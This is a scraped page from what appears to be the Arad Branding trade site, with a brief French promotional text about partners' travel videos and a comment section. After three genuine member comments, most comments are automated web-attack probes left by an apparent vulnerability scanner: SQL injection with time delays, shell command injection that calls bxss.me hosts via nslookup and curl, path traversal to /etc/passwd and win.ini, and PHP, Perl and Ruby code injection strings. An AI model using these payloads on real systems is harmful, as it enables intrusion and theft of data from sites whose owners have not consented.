اتصال به اینترنت شما ضعیف یا قطع است.

Inde, Turquie et Nigeria | Nous continuons nos voyages ensemble.

Le site Web Arad Branding en langues étrangères, les négociateurs internationaux et les mentors en exportation travaillent tous ensemble pour renforcer jour après jour le pouvoir des représentants étrangers d'Arad, tout comme nous nous efforçons de responsabiliser les commerçants iraniens d'Arad.

Les vidéos que nous envoient les représentants étrangers contiennent non seulement des informations précieuses, mais peuvent également nous montrer la culture de personnes de différents pays.

De plus, nous parcourons le monde avec eux.

En regardant et en revoyant ces vidéos, nous nous sentons dans ces lieux et notre imagerie mentale des différents pays du monde s'améliore.

En quoi cet article vous est-il utile?

Score moyen 3.67 / Nombre de voix: 3

Comments (345 Comments)

KOUAME

Bonjour. Je suis KOUAME depuis la côte d'Ivoire. C'est vraiment extraordinaire pour le travail bien fait des responsables d'Arad et des commerçants d Arad. J'attend toujours l'installation du bureau d'Arad Branding pour notre beau pays la côte d'Ivoire pour l'avancement des activités d'Arad dans notre pays la côte d'Ivoire. Contact Whatsapp +2250779086186
E.mail: kkouakouappolinaire065@gmail.com

Nuray karakaş

Herkese merhabalar kısa video gayet net bir şekilde arad branding hakkında güzel açıklama yapmıştır, bizde Türkiye' İstanbul'dan üyeliğimizi sürdürüyoruz.Her türlü ürün yelpazesiyle ihracata ürün kazandıramaya hazırız teşekkür ederiz.

akognide

Résumé : Je suis Eliel Akognide, de nationalité béninoise. Je souhaite exprimer ma gratitude aux responsables à différents niveaux pour leurs efforts dans l'amélioration du site web.

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

response.write(9005092*9853743)

ghovjnjv

555

ghovjnjv

555

ghovjnjv

'+response.write(9005092*9853743)+'

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

"+response.write(9005092*9853743)+"

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

response.write(9005223*9295050)

555

ghovjnjv

555

ghovjnjv

555

'+response.write(9005223*9295050)+'

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

"+response.write(9005223*9295050)+"

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555
bcc:009247.86200-55593.86200.3ab36.19813.2@bxss.me

ghovjnjv

555

ghovjnjv

555

ghovjnjv

to@example.com>
bcc:009247.86200-55594.86200.3ab36.19813.2@bxss.me

ghovjnjv

../../../../../../../../../../../../../../etc/passwd

ghovjnjv<esi:include src="http://bxss.me/rpb.png"/>

555

ghovjnjv

555

ghovjnjv

../../../../../../../../../../../../../../windows/win.ini

ghovjnjv bcc:009247.86200-55595.86200.3ab36.19813.2@bxss.me

555

ghovjnjv

555

ghovjnjv

file:///etc/passwd

ghovjnjv

555

to@example.com> bcc:009247.86200-55596.86200.3ab36.19813.2@bxss.me

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

${10000095+9999813}

ghovjnjv

555

ghovjnjv

../555

ghovjnjv

555

ghovjnjv

555

../../../../../../../../../../../../../../etc/passwd

555

${10000255+9999391}

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

../../../../../../../../../../../../../../windows/win.ini

555

ghovjnjv

555

ghovjnjv

555

file:///etc/passwd

555

ghovjnjv

555

cUJoU1N1ZVI=

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

../ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555&n902947=v963370

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

ghovjnjv&n957877=v925689

555

ghovjnjv

echo sppawl$()\ koawxv\nz^xyu||a #' &echo sppawl$()\ koawxv\nz^xyu||a #|" &echo sppawl$()\ koawxv\nz^xyu||a #

ghovjnjv

555

ghovjnjv

555

ghovjnjv

12345'"\'\");|]*{
?''💡

ghovjnjv

&echo xfnomj$()\ ubmlnv\nz^xyu||a #' &echo xfnomj$()\ ubmlnv\nz^xyu||a #|" &echo xfnomj$()\ ubmlnv\nz^xyu||a #

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555&echo mcagbr$()\ dxngjf\nz^xyu||a #' &echo mcagbr$()\ dxngjf\nz^xyu||a #|" &echo mcagbr$()\ dxngjf\nz^xyu||a #

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

|echo rqnacc$()\ wyqkba\nz^xyu||a #' |echo rqnacc$()\ wyqkba\nz^xyu||a #|" |echo rqnacc$()\ wyqkba\nz^xyu||a #

ghovjnjv

555

ghovjnjv

)

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555|echo gihnkg$()\ ccpmfz\nz^xyu||a #' |echo gihnkg$()\ ccpmfz\nz^xyu||a #|" |echo gihnkg$()\ ccpmfz\nz^xyu||a #

ghovjnjv

!(()&&!|*|*|

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

(nslookup -q=cname hitbjfrytznqqb4b81.bxss.me||curl hitbjfrytznqqb4b81.bxss.me))

ghovjnjv

^(#$!@#$)(()))******

ghovjnjv

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

ghovjnjv

$(nslookup -q=cname hitravijzlayi49048.bxss.me||curl hitravijzlayi49048.bxss.me)

ghovjnjv

555

)

555

ghovjnjv

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

ghovjnjv

Http://bxss.me/t/fit.txt

!(()&&!|*|*|

555

ghovjnjv

555

ghovjnjv

&nslookup -q=cname hitvepbqwlyztf1e3c.bxss.me&'\"`0&nslookup -q=cname hitvepbqwlyztf1e3c.bxss.me&`'

555

ghovjnjv

http://bxss.me/t/fit.txt?.jpg

ghovjnjv

555

^(#$!@#$)(()))******

555

ghovjnjv

&(nslookup -q=cname hituazossakvnde254.bxss.me||curl hituazossakvnde254.bxss.me)&'\"`0&(nslookup -q=cname hituazossakvnde254.bxss.me||curl hituazossakvnde254.bxss.me)&`'

ghovjnjv

/etc/shells

12345'"\'\");|]*{ <>?''💡

555

ghovjnjv

c:/windows/win.ini

ghovjnjv

555

ghovjnjv

|(nslookup -q=cname hityukuuwyhumef7ea.bxss.me||curl hityukuuwyhumef7ea.bxss.me)

ghovjnjv

555

ghovjnjv

555

ghovjnjv

`(nslookup -q=cname hitruwurkwyfjcc074.bxss.me||curl hitruwurkwyfjcc074.bxss.me)`

ghovjnjv

bxss.me

ghovjnjv

;(nslookup -q=cname hitobswhcpzase2994.bxss.me||curl hitobswhcpzase2994.bxss.me)|(nslookup -q=cname hitobswhcpzase2994.bxss.me||curl hitobswhcpzase2994.bxss.me)&(nslookup -q=cname hitobswhcpzase2994.bxss.me||curl hitobswhcpzase2994.bxss.me)

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

ghovjnjv

555

echo ltillb$()\ sqgatw\nz^xyu||a #' &echo ltillb$()\ sqgatw\nz^xyu||a #|" &echo ltillb$()\ sqgatw\nz^xyu||a #

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

ghovjnjv

555

&echo vpzdwa$()\ sfuvwk\nz^xyu||a #' &echo vpzdwa$()\ sfuvwk\nz^xyu||a #|" &echo vpzdwa$()\ sfuvwk\nz^xyu||a #

555

ghovjnjv

555

ghovjnjv

555

Http://bxss.me/t/fit.txt

555

ghovjnjv

'.gethostbyname(lc('hitzz'.'whwzfpts21083.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(84).chr(121).chr(79).'

ghovjnjv&echo slibyq$()\ ljspou\nz^xyu||a #' &echo slibyq$()\ ljspou\nz^xyu||a #|" &echo slibyq$()\ ljspou\nz^xyu||a #

555

ghovjnjv

555

ghovjnjv

555

http://bxss.me/t/fit.txt?.jpg

555

ghovjnjv

".gethostbyname(lc("hitdi"."rbttxvsl21bfe.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(76).chr(103).chr(79)."

|echo aafptf$()\ swoagl\nz^xyu||a #' |echo aafptf$()\ swoagl\nz^xyu||a #|" |echo aafptf$()\ swoagl\nz^xyu||a #

555

ghovjnjv

555

ghovjnjv

555

/etc/shells

555

'.gethostbyname(lc('hitcn'.'tpkxcnrm315f5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(75).chr(105).chr(78).'

555

ghovjnjv|echo ymauca$()\ avgeob\nz^xyu||a #' |echo ymauca$()\ avgeob\nz^xyu||a #|" |echo ymauca$()\ avgeob\nz^xyu||a #

555

ghovjnjv

555

(nslookup -q=cname hitzbfgvicugbfade2.bxss.me||curl hitzbfgvicugbfade2.bxss.me))

555

ghovjnjv

555

c:/windows/win.ini

555

".gethostbyname(lc("hitvu"."euyvaijec8a6d.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(80).chr(103).chr(83)."

555

$(nslookup -q=cname hiterhtmsfmuua47c3.bxss.me||curl hiterhtmsfmuua47c3.bxss.me)

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

bxss.me

555

&nslookup -q=cname hitswuujmlfar12268.bxss.me&'\"`0&nslookup -q=cname hitswuujmlfar12268.bxss.me&`'

555

ghovjnjv

555

ghovjnjv

555

&(nslookup -q=cname hitnaquxlvqtrcedbf.bxss.me||curl hitnaquxlvqtrcedbf.bxss.me)&'\"`0&(nslookup -q=cname hitnaquxlvqtrcedbf.bxss.me||curl hitnaquxlvqtrcedbf.bxss.me)&`'

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

|(nslookup -q=cname hitlweiltaihf36de3.bxss.me||curl hitlweiltaihf36de3.bxss.me)

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

`(nslookup -q=cname hitwlhzolmhot182ec.bxss.me||curl hitwlhzolmhot182ec.bxss.me)`

555

ghovjnjv

555

;(nslookup -q=cname hitmfkhclhrol22fea.bxss.me||curl hitmfkhclhrol22fea.bxss.me)|(nslookup -q=cname hitmfkhclhrol22fea.bxss.me||curl hitmfkhclhrol22fea.bxss.me)&(nslookup -q=cname hitmfkhclhr

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

"+"A".concat(70-3).concat(22*4).concat(106).concat(90).concat(109).concat(73)+(require"socket"
Socket.gethostbyname("hitul"+"fzhqyrwh834ef.bxss.me.")[3].to_s)+"

ghovjnjv

555

ghovjnjv

555

ghovjnjv

'+'A'.concat(70-3).concat(22*4).concat(109).concat(71).concat(111).concat(67)+(require'socket'
Socket.gethostbyname('hitil'+'wvwrhhzce8f8d.bxss.me.')[3].to_s)+'

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

index.php

"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(119).concat(65)+(require"socket" Socket.gethostbyname("hitom"+"rfjmarmi1f203.bxss.me.")[3].to_s)+"

555

ghovjnjv

555

'+'A'.concat(70-3).concat(22*4).concat(118).concat(73).concat(108).concat(69)+(require'socket' Socket.gethostbyname('hitgf'+'ttbzssuw76e47.bxss.me.')[3].to_s)+'

555

ghovjnjv

555

ghovjnjv

index.php

ghovjnjv

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ghovjnjv

555

ghovjnjv

index.php/.

ghovjnjv

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

ghovjnjv

'"()

index.php

555

ghovjnjv

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555'&&sleep(27*1000)*ulzfjl&&'

ghovjnjv

';print(md5(31337));$a='

index.php

555

ghovjnjv

555

ghovjnjv

xfs.bxss.me

ghovjnjv

";print(md5(31337));$a="

ghovjnjv

555"&&sleep(27*1000)*ontijx&&"

index.php/.

555

ghovjnjv

555

ghovjnjv

${@print(md5(31337))}

ghovjnjv

555'||sleep(27*1000)*gsgixy||'

xfs.bxss.me

555

ghovjnjv

555

ghovjnjv

${@print(md5(31337))}\

ghovjnjv

555"||sleep(27*1000)*aiavth||"

ghovjnjv

'"

ghovjnjv

'.print(md5(31337)).'

ghovjnjv

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

'"

555

';print(md5(31337));$a='

555

<!--

555

ghovjnjv

555

";print(md5(31337));$a="

555

${@print(md5(31337))}

555

${@print(md5(31337))}\

555

'"()

555

'.print(md5(31337)).'

555

ghovjnjv'&&sleep(27*1000)*veldnu&&'

555

ghovjnjv"&&sleep(27*1000)*yciyza&&"

555

ghovjnjv'||sleep(27*1000)*kbtauc||'

555

ghovjnjv

555

ghovjnjv"||sleep(27*1000)*lydvpx||"

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

555

ghovjnjv

ZzM7IQIx

ghovjnjv

555

ghovjnjv

-1 OR 2+894-894-1=0+0+0+1 --

ghovjnjv

-1 OR 2+455-455-1=0+0+0+1

ghovjnjv

-1' OR 2+652-652-1=0+0+0+1 --

ghovjnjv

-1' OR 2+310-310-1=0+0+0+1 or 'bTb3AV9Q'='

ghovjnjv

-1" OR 2+234-234-1=0+0+0+1 --

ghovjnjv

if(now()=sysdate(),sleep(15),0)

ghovjnjv

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

ghovjnjv

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

ghovjnjv

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

ghovjnjv

-1; waitfor delay '0:0:15' --

ghovjnjv

-1); waitfor delay '0:0:15' --

ghovjnjv

1 waitfor delay '0:0:15' --

ghovjnjv

eJ1CJaUr'; waitfor delay '0:0:15' --

ghovjnjv

-5 OR 243=(SELECT 243 FROM PG_SLEEP(15))--

ghovjnjv

-5) OR 291=(SELECT 291 FROM PG_SLEEP(15))--

ghovjnjv

-1)) OR 887=(SELECT 887 FROM PG_SLEEP(15))--

ghovjnjv

TvBZ4iOP' OR 867=(SELECT 867 FROM PG_SLEEP(15))--

ghovjnjv

gVbxgBg5') OR 708=(SELECT 708 FROM PG_SLEEP(15))--

ghovjnjv

iyl72M3T')) OR 381=(SELECT 381 FROM PG_SLEEP(15))--

ghovjnjv

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ghovjnjv

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

ghovjnjv

1'"

ghovjnjv

1????%2527%2522

ghovjnjv

@@Xhp0n

ghovjnjv

555

ghovjnjv

555

48rqe4bg

555

ghovjnjv

555

-1 OR 2+765-765-1=0+0+0+1 --

555

-1 OR 2+254-254-1=0+0+0+1

555

-1' OR 2+201-201-1=0+0+0+1 --

555

-1' OR 2+252-252-1=0+0+0+1 or 'SBnjqUiV'='

555

-1" OR 2+587-587-1=0+0+0+1 --

555

if(now()=sysdate(),sleep(15),0)

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

1 waitfor delay '0:0:15' --

555

iWF7aIxC'; waitfor delay '0:0:15' --

555

Y3Y4xcgs' OR 880=(SELECT 880 FROM PG_SLEEP(15))--

555

v3VEsPyr') OR 941=(SELECT 941 FROM PG_SLEEP(15))--

555

n6L4XGSR')) OR 234=(SELECT 234 FROM PG_SLEEP(15))--

555

ghovjnjv'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

1'"

555

1????%2527%2522

555

@@5I39c

555